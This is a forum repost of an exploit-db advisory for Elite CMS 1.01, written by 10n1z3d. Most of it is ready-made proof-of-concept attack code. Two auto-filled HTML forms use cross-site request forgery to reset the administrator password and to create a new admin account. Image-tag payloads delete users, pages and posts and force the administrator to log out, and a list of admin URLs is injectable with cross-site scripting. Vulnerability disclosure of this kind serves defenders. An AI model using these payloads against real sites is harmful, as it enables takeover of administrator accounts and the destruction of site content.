Exploit Elite CMS 1.01 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14318
Проверка EDB
  1. Пройдено
Автор
10N1Z3D
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-07-10
HTML:
# Name: Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities
# Author: 10n1z3d <10n1z3d[at]w[dot]cn>
# Date: Sat 10 Jul 2010 08:05:44 PM EEST 
# Vendor: http://elitecms.net/
# Download: http://elitecms.net/download.php?download=eliteCMS

-=[ CSRF PoC 1 - Change Admin Password ]=-

    <html>
        <head>
            <title>Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities - Change Admin Password</title>
        </head>
        <body>
                <!--- Edit these --->
            <form action="http://[domain]/admin/edit_user.php?user=1" method="post">
                <input type="hidden" name="password" value="pwned" />
                <input type="hidden" name="email" value="[email protected]" />
                <input type="hidden" name="first_name" value="pwned" />
                <!--- Do not edit below --->
                <input type="hidden" name="s_admin" value="1" />
                <input type="hidden" name="active" value="1" />
                <!--- At least they check this --->
                <input type="submit" name="submit" value="Continue" />
            </form>
        </body>
    </html>

-=[ CSRF PoC 2 - Create Admin User ]=-

    <html>
        <head>
            <title>Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities - Create Admin User</title>
        </head>
        <body>
                <!--- Edit these --->
            <form action="http://[domain]/admin/new_user.php" method="post">
                <input type="hidden" name="user_name" value="root" />
                <input type="hidden" name="password" value="root" />
                <input type="hidden" name="email" value="[email protected]"/>
                <input type="hidden" name="first_name" value="root"/>
                <!--- Do not edit below --->
                <input type="hidden" name="s_admin" value="1" />
                <input type="hidden" name="active" value="1" />
                <!--- At least they check this --->
                <input type="submit" name="submit" value="Continue" />
            </form>
        </body>
    </html>

-=[ CSRF PoC 3 - Delete User ]=-

    <img src="http://[domain]/admin/delete_user.php?user=2" alt="Do you see this?" />

-=[ CSRF PoC 4 - Delete Page ]=-

    <img src="http://[domain]/admin/delete_page.php?page=1" alt="Do you see this?" />

-=[ CSRF PoC 5 - Delete Post ]=-

    <img src="http://[domain]/admin/delete_post.php?post=1" alt="Do you see this?" />

-=[ CSRF PoC 6 - Logout The Administrator ]=-

    <img src="http://[domain]/admin/logout.php" alt="Do you see this?" />

-=[ XSS ]=-

    http://[domain]/admin/edit_page.php?page=1[XSS]
    http://[domain]/admin/edit_post.php?page=1[XSS]
    http://[domain]/admin/add_post.php?page=1[XSS]

Also all of the text fields in the administration panel accept xss code.


Not so l33t huh?
Visit us at http://www.evilzone.org/.
 
Источник
www.exploit-db.com

Похожие темы